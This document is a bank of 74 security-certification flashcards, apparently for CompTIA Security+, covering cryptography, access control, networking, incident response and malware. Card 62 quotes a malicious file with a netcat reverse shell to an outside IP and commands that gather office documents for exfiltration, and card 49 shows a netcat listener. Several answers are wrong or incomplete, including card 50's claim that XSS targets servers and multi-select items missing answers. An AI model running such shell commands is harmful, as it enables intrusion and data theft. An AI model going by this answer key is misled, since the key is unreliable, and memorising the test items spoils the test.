Bank 3 Flashcards

(74 cards)

1
Q
A security specialist is notified about a certificate warning that users receive when using a new internal website. After being given the URL from one of the users and seeing the warning, the security specialist inspects the certificate and realizes it has been issued to the IP address, which is how the developers reach the site. Which of the following would BEST resolve the issue?
A. OSCP
B. OID
C. PEM
D. SAN
A

D. SAN

2
Q
Which of the following is a random value appended to a credential that makes the credential less susceptible to compromise when hashed?
A. Nonce
B. Salt
C. OTP
D. Block cipher
E. IV
A

B. Salt

3
Q
A systems administrator has created network file shares for each department with associated security groups for each role within the organization. Which of the following security concepts is the systems administrator implementing?
A. Separation of duties
B. Permission auditing
C. Least privilege
D. Standard naming convention
A

C. Least privilege

4
Q
Data center employees have been battling alarms in a data center that has been experiencing hotter than normal temperatures. The server racks are designed so all 48 rack units are in use, and servers are installed in any manner in which the technician can get them installed. Which of the following practices would BEST alleviate the heat issues and keep costs low?
A. Utilize exhaust fan
B. Use hot and cold aisles
C. Air gap the racks
D. Use a secondary AC unit
A

B. Use hot and cold aisles

5
Q
A company has just completed a vulnerability scan of its servers. A legacy application that monitors the HVAC system in the data center presents several challenges, as the application vendor is no longer in business. Which of the following secure network architecture concepts would BEST protect the other company servers if the legacy server were to be exploited?
A. Virtualization
B. Air gap
C. VLAN
D. Extranet
A

C. VLAN

6
Q
A company recently experienced data exfiltration via the corporate network. In response to the breach, a security analyst recommends deploying an out-of-band IDS solution. The analyst says the solution can be implemented without purchasing any additional network hardware. Which of the following solutions will be used to deploy the IDS?
A. Network tap
B. Network proxy
C. Honeypot
D. Port mirroring
A

D. Port mirroring

7
Q
A security consultant is setting up a new electronic messaging platform and wants to ensure the platform supports message integrity validation. Which of the following protocols should the consultant recommend?
A. S/MIME
B. DNSSEC
C. RADIUS
D. 802.11x
A

A. S/MIME

8
Q
Joe, a contractor, is hired by a firm to perform a penetration test against the firm’s infrastructure. When conducting the scan, he receives only the network diagram and the network list to scan against the network. Which of the following scan types is Joe performing?
A. Authentication
B. White box
C. Automated
D. Gray box
A

D. Gray box

9
Q

A technician has discovered a crypto-virus infection on a workstation that has access to sensitive remote resources. Which of the following is the immediate NEXT step the technician should take?
A. Determine the source of the virus that has infected the workstation
B. Sanitize the workstation’s internal drive
C. Reimage the workstation for normal operation
D. Disable the network connections on the workstation

A

D. Disable the network connections on the workstation

10
Q
Which of the following access management concepts is MOST closely associated with the use of a password or PIN?
A. Authorization
B. Authentication
C. Accounting
D. Identification
A

B. Authentication

11
Q
A company has a team of penetration testers. This team has located a file on the company file server that they believe contains clear text usernames followed by a hash. Which of the following tools should the penetration testers use to learn more about the content of this file?
A. Exploitation framework
B. Vulnerability scanner
C. Netcat
D. Password cracker
A

D. Password cracker

12
Q

Which of the following could occur when both strong and weak ciphers are configured on a VPN concentrator? (SELECT TWO)
A. An attacker could potentially perform a downgrade attack
B. The connection is vulnerable to resource exhaustion
C. The integrity of the data could be at risk
D. The VPN concentrator could revert to L2TP
E. The IPSec payload is reverted to 16-bit sequence numbers

A

C. The integrity of the data could be at risk

13
Q
A security administrator is configuring a RADIUS server for wireless authentication. The configuration must ensure client credentials are encrypted end-to-end between the client and the authenticator. Which of the following protocols should be configured on the RADIUS server? (SELECT TWO)
A. PAP
B. MSCHAP
C. PEAP
D. NTLM
E. SAML
A

B. MSCHAP

C. PEAP

14
Q
A company wishes to move all of its services and applications to a cloud provider but wants to maintain full control of the deployment, access, and provisions of its services to its users. Which of the following BEST represents the required cloud deployment model?
A. SaaS
B. IaaS
C. MaaS
D. Hybrid
E. Private
A

B. IaaS

15
Q
Ann is the IS manager for several new systems in which the classifications of the systems’ data are being decided. She is trying to determine the sensitivity level of the data being processed. Which of the following people should she consult to determine the data classification?
A. Steward
B. Custodian
C. User
D. Owner
A

D. Owner

16
Q
A new Chief Information Officer (CIO) has been reviewing the badge procedures and decides to write a policy that all employees must have their badges rekeyed at least annually. Which of the following controls BEST describes this policy?
A. Physical
B. Corrective
C. Technical
D. Administrative
A

D. Administrative

17
Q

An incident response analyst at a large corporation is reviewing proxy log data. The analyst believes a malware infection may have occurred. Upon further review, the analyst determines the computer responsible for the suspicious network traffic is used by the Chief Executive Officer (CEO). Which of the following is the best NEXT step for the analyst to take?
A. Call the CEO directly to ensure awareness of the event
B. Run a malware scan on the CEO’s workstation
C. Reimage the CEO’s workstation
D. Disconnect the CEO’s workstation from the network

A

D. Disconnect the CEO’s workstation from the network

18
Q

A security analyst monitors the syslog server and notices the following:

pinging 10.25.27.31 with 65500 bytes of data
Reply from 10.25.27.31 bytes=65500 times<1ms TTL=128
Reply from 10.25.27.31 bytes=65500 times<1ms TTL=128
Reply from 10.25.27.31 bytes=65500 times<1ms TTL=128
Reply from 10.25.27.31 bytes=65500 times<1ms TTL=128
Reply from 10.25.27.31 bytes=65500 times<1ms TTL=128
Reply from 10.25.27.31 bytes=65500 times<1ms TTL=128

Which of the following attacks is occurring?
A. Memory leak
B. Buffer overflow
C. Null pointer dereference
D. Integer overflow
A

B. Buffer overflow

19
Q
Hacktivists are most commonly motivated by:
A. curiosity
B. notoriety
C. financial gain
D. political cause
A

D. political cause

20
Q
A security analyst identified an SQL injection attack. Which of the following is the FIRST step in remediating the vulnerability?
A. Implement stored procedures
B. Implement input validations
C. Implement proper error handling
D. Implement a WAF
A

B. Implement input validations

21
Q
A company is performing an analysis of the corporate enterprise network with the intent of identifying any one system, person, function, or service that, when neutralized, will cause or cascade disproportionate damage to the company’s revenue, referrals, and reputation. Which of the following is an element of the BIA that this action is addressing?
A. Identification of critical systems
B. Single point of failure
C. Value assessment
D. Risk register
A

B. Single point of failure

22
Q
A stock trading company had the budget for enhancing its secondary data center approved. Since the main site is in a hurricane-affected area and the disaster recovery site is 100mi (161km) away, the company wants to ensure its business is always operational with the least amount of man hours needed. Which of the following types of disaster recovery sites should the company implement?
A. Hot site
B. Warm site
C. Cold site
D. Cloud-based site
A

A. Hot site

23
Q

Which of the following is the BEST way for home users to mitigate vulnerabilities associated with IoT devices on their home networks?
A. Power off the devices when they are not in use
B. Prevent IoT devices from contacting the Internet directly
C. Apply firmware and software updates upon availability
D. Deploy a bastion host on the home network

A

C. Apply firmware and software updates upon availability

24
Q

A security administrator wants to implement a logon script that will prevent MITM attacks on the local LAN. Which of the following commands should the security administrator implement within the script to accomplish this task?
A. arp –s 192.168.1.1 00-3a-d1-fa-b1-06
B. dig –x @192.168.1.1 mypc.comptia.com
C. nmap –A _T4 192.168.1.1
D. tcpdump –lnv host 192.168.1.1 or either 00:3a:d1:fa:b1:06

A

A. arp –s 192.168.1.1 00-3a-d1-fa-b1-06

25
Which of the following methods is used by internal security teams to assess the security of internally developed applications?
A. Active reconnaissance
B. Pivoting
C. White box testing
D. Persistence
C. White box testing
26
A web server, which is configured to use TLS with AES-GCM-256, SHA-384, and ECDSA, recently suffered an information loss breach. Which of the following is MOST likely the cause?
A. Insufficient key bit length
B. Weak cipher suite
C. Unauthenticated encryption method
D. Poor implementation
D. Poor implementation
27
A forensics analyst is investigating a hard drive for evidence of suspected illegal activity. Which of the following should the analyst do FIRST?
A. Create a hash of the hard drive
B. Export the Internet history
C. Save a copy of the case number and date as a text file in the root directory
D. Back up the pictures directory for further inspection
A. Create a hash of the hard drive
28
Which of the following attacks can be used to exploit a vulnerability created by an untrained user?
A. A spear phishing email with file attachment
B. A DoS using IoT devices
C. An evil twin wireless access point
D. A domain hijacking of a bank website
A. A spear phishing email with file attachment
29
Which of the following is an example of resource exhaustion?
A. A penetration tester requests every available IP address from a DHCP server
B. An SQL injection attack returns confidential data back to the browser
C. Server CPU utilization peaks at 100% during the reboot process
D. System requirements for a new software package recommend having 12GB of RAM, but only 8GB are available
A. A penetration tester requests every available IP address from a DHCP server
30
A small enterprise decides to implement a warm site to be available for business in case of a disaster. Which of the following BEST meets its requirements?
A. A fully operational site that has all the equipment in place and full data backup tapes on site
B. A site used for its data backup storage that houses a full-time network administrator
C. An operational site requiring some equipment to be relocated as well as data transfer to the site
D. A site with personnel requiring both equipment and data relocated there in case of disaster
C. An operational site requiring some equipment to be relocated as well as data transfer to the site
31
When used together, which of the following qualify as two-factor authentication?
A. Password and PIN
B. Smart card and PIN
C. Proximity card and smart card
D. Fingerprint scanner and iris scanner
B. Smart card and PIN
32
Which of the following is used to validate the integrity of data?
A. CBC
B. Blowfish
C. MD5
D. RSA
C. MD5
33
A network administrator is brute forcing accounts through a web interface. Which of the following would provide the BEST defense from an account password being discovered?
A. Password history
B. Account lockout
C. Account expiration
D. Password complexity
B. Account lockout
34
An organization employee resigns without giving adequate notice. The following day, it is determined that the employee is still in possession of several company-owned mobile devices. Which of the following could have reduced the risk of this occurring? (SELECT TWO)
A. Proper off boarding procedures
B. Acceptable use policies
C. Non-disclosure agreements
D. Exit interviews
E. Background checks
F. Separation of duties
A. Proper off boarding procedures | D. Exit interviews
35
A security technician has been given the task of preserving emails that are potentially involved in a dispute between a company and a contractor. Which of the following BEST describes this forensic concept?
A. Legal hold
B. Chain of custody
C. Order of volatility
D. Data acquisition
A. Legal hold
36
As part of a BYOD rollout, a security analyst has been asked to find a way to securely store company data on personal devices. Which of the following would BEST help to accomplish this?
A. Require the use of an eight-character PIN
B. Implement containerization of company data
C. Require annual AUP sign-off
D. Use geofencing tools to unlock devices while on the premises
B. Implement containerization of company data
37
Which of the following are considered among the BEST indicators that a received message is a hoax? (SELECT TWO)
A. Minimal use of uppercase letters in the message
B. Warnings of monetary letters in the message
C. No valid digital signature from a known security organization
D. Claims of possible damage to computer hardware
E. Embedded URLs
A. Minimal use of uppercase letters in the message | E. Embedded URLs
38
An organization has air gapped a critical system. Which of the following BEST describes the type of attacks that are prevented by this security measure?
A. Attacks from another local network segment
B. Attacks exploiting USB drives and removable media
C. Attacks that spy on leaked emanations or signals
D. Attacks that involve physical intrusion or theft
A. Attacks from another local network segment
39
Ann, a security analyst, wants to implement a secure exchange of email. Which of the following is the BEST option for Ann to implement?
A. PGP
B. HTTPS
C. WPA
D. TLS
A. PGP
40
A company wants to implement a wireless network with the following requirements:
* All wireless users will have a unique credential
* User certificates will not be required for authentication
* The company’s AAA infrastructure must be utilized
* Local hosts should not store authentication tokens
Which of the following should be used in the design to meet the requirements?
A. EAP-TLS
B. WPA
C. PSK
D. PEAP
D. PEAP
41
Two users must encrypt and transmit large amounts of data between them. Which of the following should they use to encrypt and transmit the data?
A. Symmetric algorithm
B. Hash function
C. Digital signature
D. Obfuscation
A. Symmetric algorithm
42
A security administrator is reviewing the following configuration after receiving reports that users are unable to connect to remote websites:
```
10 PERMIT FROM:ANY TO:ANY PORT:80
20 PERMIT FROM:ANY TO:ANY PORT:443
30 DENY FROM:ANY TO:ANY PORT:ANY
```
Which of the following is the MOST secure solution the security administrator can implement to fix this issue?
A. Add the following rule to the firewall: 5 PERMIT FROM:ANY TO:ANY PORT:53
B. Replace rule number 10 with the following rule: 10 PERMIT FROM:ANY TO:ANY PORT:22
C. Insert the following rule in the firewall: 25 PERMIT FROM:ANY TO:ANY PORTS:ANY
D. Remove the following rule from the firewall: 30 DENY FROM:ANY TO:ANY PORT:ANY
A. Add the following rule to the firewall: 5 PERMIT FROM:ANY TO:ANY PORT:53
43
An organization’s employees currently use three different sets of credentials to access multiple internal resources. Management wants to make this process less complex. Which of the following would be the BEST option to meet this goal?
A. Transitive trust
B. Single sign-on
C. Federation
D. Secure token
B. Single sign-on
44
A security administrator wants to determine if a company’s web servers have the latest operating system and application patches installed. Which of the following types of vulnerability scans should be conducted?
A. Non-credentialed
B. Passive
C. Port
D. Credentialed
E. Red team
F. Active
D. Credentialed
45
A company has two wireless networks utilizing captive portals. Some employees report getting a trust error in their browsers when connecting to one of the networks. Both captive portals are using the same server certificate for authentication, but the analyst notices the following differences between the two certificate details:
```
Certificate 1
Certificate Path:
Geotrust Global CA
*.company.com

Certificate 2
Certificate Path:
*.company.com
```
Which of the following would resolve the problem?
A. Use a wildcard certificate
B. Use certificate chaining
C. Use a trust model
D. Use an extended validation certificate
B. Use certificate chaining
46
A security analyst conducts a manual scan on a known hardened host that identifies many non-compliant configuration items. Which of the following BEST describe why this has occurred? (SELECT TWO)
A. Privileged-use credentials were used to scan the host
B. Non-applicable plugins were selected in the scan policy
C. The incorrect audit file was used
D. The output of the report contains false positives
E. The target host has been compromised
A. Privileged-use credentials were used to scan the host | D. The output of the report contains false positives
47
A user needs to transmit confidential information to a third party. Which of the following should be used to encrypt the message?
A. AES
B. SHA-2
C. SSL
D. RSA
A. AES
48
A security administrator is developing a methodology for tracking staff access to patient data. Which of the following would be the BEST method for creating audit trails for usage reports?
A. Deploy file integrity checking
B. Restrict access to the database by following the principle of least privilege
C. Implement a database activity monitoring system
D. Create automated alerts on the IDS system for the database server
C. Implement a database activity monitoring system
49
A cybersecurity analyst is looking into the payload of a random packet capture file that was selected for analysis. The analyst notices that an internal host had a socket established with another internal host over a non-standard port. Upon investigation, the origin host that initiated the socket shows this output:
```
usera@host>history
mkdir /local/usr/bin/somedirectory
nc -1 192.168.5.1 –p 9856
ping –c 30 8.8.8.8 –s 600
rm /etc/dir2/somefile
rm –rm /etc/dir2/
traceroute 8.8.8.8
pskill pid 9487
usera@host>
```
Given the above output, which of the following commands would have established the questionable socket?
A. traceroute 8.8.8.8
B. ping -1 30 8.8.8.8 –s 600
C. nc -1 192.168.5.1 –p 9856
D. pskill pid 9487
C. nc -1 192.168.5.1 –p 9856
50
Which of the following is a major difference between XSS attacks and remote code exploits?
A. XSS attacks use machine language, while remote exploits use interpreted language
B. XSS attacks target servers, while remote code exploits target clients
C. Remote code exploits aim to escalate attackers’ privileges, while XSS attacks aim to gain access only
D. Remote code exploits allow writing code at the client side and executing it, while XSS attacks require no code to work
B. XSS attacks target servers, while remote code exploits target clients
51
An organization is developing its mobile device management policies and procedures and is concerned about vulnerabilities associated with sensitive data being saved to a mobile device, as well as weak authentication when using a PIN. As part of discussions on the topic, several solutions are proposed. Which of the following controls, when required together, will address the protection of data-at-rest as well as strong authentication? (SELECT TWO)
A. Containerization
B. FDE
C. Remote wipe capability
D. MDM
E. MFA
F. OTA updates
B. FDE | E. MFA
52
When considering IoT systems, which of the following represents the GREATEST ongoing risk after a vulnerability has been discovered?
A. Difficult-to-update firmware
B. Tight integration to existing systems
C. IP address exhaustion
D. Not using industry standards
B. Tight integration to existing systems
53
A systems administrator is configuring a new network switch for TACACS+ management and authentication. Which of the following must be configured to provide authentication between the switch and the TACACS+ server?
A. 802.1X
B. SSH
C. Shared secret
D. SNMPv3
E. CHAP
C. Shared secret
54
A government agency with sensitive information wants to virtualize its infrastructure. Which of the following cloud deployment models BEST fits the agency’s needs?
A. Public
B. Community
C. Private
D. Hybrid
C. Private
55
Which of the following enables sniffing attacks against a switched network?
A. ARP poisoning
B. IGMP snooping
C. IP spoofing
D. SYN flooding
A. ARP poisoning
56
Which of the following strategies helps reduce risk if a rollback is needed when upgrading a critical system platform?
A. Non-persistent configuration
B. Continuous monitoring
C. Firmware updates
D. Fault tolerance
A. Non-persistent configuration
57
An office recently completed digitizing all its paper records. Joe, the data custodian, has been tasked with the disposal of the paper files, which include:
• Intellectual property
• Payroll records
• Financial information
• Drug screening results
Which of the following is the BEST way to dispose of these items?
A. Shredding
B. Pulping
C. Deidentifying
D. Recycling
B. Pulping
58
A security engineer implements multiple technical measures to secure an enterprise network. The engineer also works with the Chief Information Officer (CIO) to implement policies to govern user behavior. Which of the following strategies is the security engineer executing?
A. Baselining
B. Mandatory access control
C. Control diversity
D. System hardening
C. Control diversity | D. System hardening
59
Which of the following differentiates ARP poisoning from a MAC spoofing attack?
A. ARP poisoning uses unsolicited ARP replies
B. ARP poisoning overflows a switch’s CAM table
C. MAC spoofing uses DHCPOFFER/DHCPACK packets
D. MAC spoofing can be performed across multiple routers
D. MAC spoofing can be performed across multiple routers
60
A security analyst, who is analyzing the security of the company’s web server, receives the following output:
```
POST http://www.acme.com/AuthenticationServlet HTTP/1.1
Host:www.acme.com
accept: text/xm;, application/xml, application/xhtml = xml
Keep-Alive: 300
Connection: keep-alive
Referrer: http://acme.com/index.jsp
Cookie:JSESSIONID=LvzZRJJXgwyWPWEQMhS49vtW1yJdvn78CG1Kp5jTvvChDyPknm4t!
Content-type:application/x-www-form-urlencoded
Content-length:64

delegate_service=131&user=acme1&pass=test&submis=SUBMIT
```
Which of the following is the issue?
A. Code signing
B. Stored procedures
C. Access violations
D. Unencrypted credentials
D. Unencrypted credentials
61
After a series of breaches, a network administrator identified that staff recorded complex passwords in writing. The network administrator is adding multifactor authentication to the system. Which of the following should the administrator implement?
A. Hardware tokens
B. User PIN
C. Image patterns
D. Security questions
A. Hardware tokens
62
A security analyst believes an employee’s workstation has been compromised. The analyst reviews the system logs, but does not find any attempted logins. The analyst then runs the diff command, comparing the C:\Windows\System32 directory and the installed cache directory. The analyst finds a series of files that look suspicious. One of the files contains the following commands:
```
md /C %TEMP%\nc –e cmd.exe 34.100.43.230
copy *.doc > %TEMP%\docfiles.zip
copy *.xls > %TEMP%\xlsfiles.zip
copy *.pdf > %TEMP%\pdffiles.zip
```
Which of the following types of malware was used?
A. Worm
B. Spyware
C. Logic bomb
D. Backdoor
B. Spyware
63
A security administrator is analyzing a user report in which the computer exhibits odd network-related outages. The administrator, however, does not see any suspicious processes running. A prior technician’s notes indicate the machine has been remediated twice, but the system still exhibits odd behavior. Files were deleted from the system recently. Which of the following is the MOST likely cause of this behavior?
A. Crypto-malware
B. Rootkit
C. Logic bomb
D. Session hijacking
B. Rootkit
64
A security technician is configuring an access management system to track and record user actions. Which of the following functions should the technician configure?
A. Accounting
B. Authorization
C. Authentication
D. Identification
A. Accounting
65
A business sector is highly competitive, and safeguarding trade secrets and critical information is paramount. On a seasonal basis, an organization employs temporary hires and contractor personnel to accomplish its mission objectives. The temporary and contract personnel require access to network resources only when on the clock. Which of the following account management practices are the BEST ways to manage these accounts? (SELECT TWO)
A. Employ time-of-day restrictions
B. Employ password complexity
C. Employ a random key generator strategy
D. Employ an account expiration strategy
E. Employ a password lockout policy
A. Employ time-of-day restrictions | D. Employ an account expiration strategy
66
A security administrator is creating a risk assessment with regard to how to harden internal communications in transit between servers. Which of the following should the administrator recommend in the report?
A. Configure IPSec in transport mode
B. Configure server-based PKI certificates
C. Configure the GRE tunnel
D. Configure a site-to-site tunnel
B. Configure server-based PKI certificates
67
A user is unable to open a file that has a grayed-out icon with a lock. The user receives a pop-up message indicating that payment must be sent in Bitcoin to unlock the file. Later in the day, other users in the organization lose the ability to open files on the server. Which of the following has MOST likely occurred? (SELECT THREE)
A. Crypto-malware
B. Adware
C. Botnet attack
D. Virus
E. Ransomware
F. Backdoor
G. DDoS attack
A. Crypto-malware | E. Ransomware
68
A security administrator wants to implement least privilege access for a network share that stores sensitive company data. The organization is particularly concerned with the integrity of data and implementing discretionary access control. The following controls are available:
* Read = A user can read the content of an existing file
* Write = A user can modify the content of an existing file and delete an existing file
* Create = A user can create a new file and place data within the file
A missing control means the user does not have that access. Which of the following configurations provides the appropriate control to support the organization’s requirements?
A. Owners: Read, Write, Create Group Members: Read, Write Others: Read, Create
B. Owners: Write, Create Group Members: Read, Write, Create Others: Read
C. Owners: Read, Write Group Members: Read, Create Others: Read, Create
D. Owners: Write, Create Group Members: Read, Create Others: Read, Write, Create
A. Owners: Read, Write, Create Group Members: Read, Write Others: Read, Create
69
A new security administrator ran a vulnerability scanner for the first time and caused a system outage. Which of the following types of scans MOST likely caused the outage?
A. Non-intrusive credential scan
B. Non-intrusive non-credential scan
C. Intrusive credentialed scan
D. Intrusive non-credentialed scan
C. Intrusive credentialed scan
70
A hacker has a packet capture that contains:
```
…………….qw………………………….5
...Joe.Smith….E289F21CD33E4F57890DDEA5CF267ED2..
…Jane.Doe…..AD1FAB10D33E4F57890DDEA5CF267ED2..
……………………document.pdf………….………….9…………………
…John.Key……3374E9E7E33E4F57890DDEA5CF267ED2..
```
Which of the following tools will the hacker use against this type of capture?
A. Password cracker
B. Vulnerability scanner
C. DLP scanner
D. Fuzzer
A. Password cracker
71
Joe, a member of the sales team, recently logged into the company servers after midnight local time to download the daily lead form before his co-workers did. Management has asked the security team to provide a method for detecting this type of behavior without impeding the access for sales employees as they travel overseas. Which of the following would be the BEST method to achieve this objective?
A. Configure time-of-day restrictions for the sales staff
B. Install DLP software on the devices used by sales employees
C. Implement a filter on the mail gateway that prevents the lead form from being emailed
D. Create an automated alert on the SIEM for anomalous sales team activity
D. Create an automated alert on the SIEM for anomalous sales team activity
72
Which of the following is a deployment concept that can be used to ensure only the required OS access is exposed to software applications?
A. Staging environment
B. Sandboxing
C. Secure baseline
D. Trusted OS
D. Trusted OS
73
A company wants to ensure users are only logging into the system from their laptops when they are on site. Which of the following would assist with this?
A. Geofencing
B. Smart cards
C. Biometrics
D. Tokens
A. Geofencing
74
A security administrator has completed a monthly review of DNS server query logs. The administrator notices continuous name resolution attempts from a large number of internal hosts to a single Internet addressable domain name. The security administrator then correlated those logs with the establishment of persistent TCP connections out to this domain. The connections seem to be carrying on the order of kilobytes of data per week. Which of the following is the MOST likely explanation for this anomaly?
A. An attacker is exfiltrating large amounts of proprietary company data
B. Employees are playing multiplayer computer games
C. A worm is attempting to spread to other hosts via SMB exploits
D. Internal hosts have become members of a botnet
D. Internal hosts have become members of a botnet